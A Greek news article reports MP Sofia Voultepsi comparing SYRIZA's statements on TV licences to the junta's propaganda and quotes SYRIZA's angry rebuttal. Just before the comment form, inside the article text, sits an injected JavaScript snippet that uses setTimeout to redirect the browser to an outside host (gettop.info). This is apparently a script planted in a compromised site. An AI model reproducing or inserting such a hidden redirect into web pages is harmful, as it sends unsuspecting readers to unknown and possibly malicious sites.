Βούλτεψη: Και ο ΣΥΡΙΖΑ λέει τα ίδια που έλεγε η Χούντα για να κοιμίζει τον λαό

0
11

 

Σάλο προκάλεσε η βουλευτής της ΝΔ Σοφία Βούλτεψη μιλώντας για τις τηλεοπτικές άδειες στον Real fm 97,8 και σχολιάζοντας τους χειρισμούς της κυβέρνησης, ανέφερε μεταξύ άλλων, πως η κυβέρνηση λέει τα ίδια με τη Χούντα των Συνταγματαρχών.

«Έχω μπροστά μου τις δηλώσεις του Παττακού ως εκπρόσωπος Τύπου της δικτατορίας. Αν τις βάλετε δίπλα στις σημερινές δηλώσεις του ΣΥΡΙΖΑ θα πάθετε σοκ, λένε τα ίδια που έλεγε η Χούντα για να κοιμίζει τον λαό. Τα λένε γιατί κόβονται αύριο οι επικουρικές συντάξεις. Είναι ίδιοι. Ο Παττακός και ο Παπαδόπουλος έλεγαν πως ήταν ψηφισμένοι από τον λαό γιατί είχαν κάνει το δημοψήφισμα«.

Για τις τηλεοπτικές άδειες δήλωσε χαρακτηριστικά: «Η ΝΔ αυτό που ήθελε πάντα είναι αυτά τα ζητήματα ανατίθενται στο Εθνικό Συμβούλιο Ραδιοτηλεόρασης, το οποίο είναι το μόνο αρμόδιο όργανο, η ανεξάρτητη αρχή που ασχολείται με ζητήματα του ραδιοτηλεοπτικού τοπίου».

«Μεγάλο ψέμα της κυβέρνησης ότι δεν συναίνεσε η ΝΔ στη συγκρότηση του ΕΣΡ. Εμείς ζητήσαμε, το 2014 που ήμουν αρμόδια υπουργός, να συσταθεί το ΕΣΡ, ζητώντας τους να προτείνουν πρόσωπα που θα μπορούσαν να ψηφιστούν και εκείνοι είπαν ότι δεν πρόκειται να προτείνουν κανέναν», σημείωσε χαρακτηριστικά η κ. Βούλτεψη και επισήμανε: «Έκαναν ό,τι μπορούσαν για να μην συσταθεί το ΕΣΡ. Σκοπός τους ήταν να μην συσταθεί το ΕΣΡ, ώστε να μπορεί ο υπουργός να κάνει τον καναλάρχη. Εμείς δεν υπάρχει περίπτωση να ρίξουμε μαύρο. Με τα παραμύθια που λένε για τα μαύρα θα αποδείξουν ότι είναι οι καλύτεροι διάδοχοι των διδακτορικών καθεστώτων που πέρασαν ποτέ από την χώρα και από αλλού«, πρόσθεσε, υπογραμμίζοντας ότι οι κινήσεις των κυβερνούντων «να περιορίζουν τα ΜΜΕ και οι δηλώσεις τους θυμίζουν την περίοδο της δικτατορίας».

Άμεση απάντηση από ΣΥΡΙΖΑ

Άμεση και έντονη ήταν η αντίδραση του ΣΥΡΙΖΑ, που σε ανακοίνωση του ανέφερε χαρακτηριστικά:
«Ο πανικός της Νέας Δημοκρατίας για την επικράτηση της νομιμότητας στον χώρο της τηλεόρασης και η αγωνιώδης προσπάθειά της να στηρίξει το σύστημα της διαπλοκής, που τόσα χρόνια έτρεφε, έχει φτάσει σε πρωτοφανές επίπεδο. Σήμερα, η κ. Βούλτεψη, όχι μόνο συνέκρινε την εκλεγμένη, δημοκρατική κυβέρνηση της χώρας με τη Χούντα, αλλά έφτασε στο σημείο να δηλώσει ότι ο Παττακός και ο Παπαδόπουλος ήταν νόμιμα εκλεγμένοι από τον λαό, μέσω του (ψευτο)δημοψηφίσματος!

Δεν περιμέναμε η κ. Βούλτεψη να φτάσει σε τέτοιο επίπεδο πολιτικού ξεπεσμού, παραχάραξης της Ιστορίας και ακροδεξιού παραληρήματος. Αναμένουμε από τον αρχηγό της ΝΔ να σπάσει τη σιωπή του σχετικά με τις τηλεοπτικές άδειες, έστω και για να καταδικάσει τις απαράδεκτες δηλώσεις της κ. Βούλτεψη», καταλήγει η ανακοίνωση του ΣΥΡΙΖΑ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here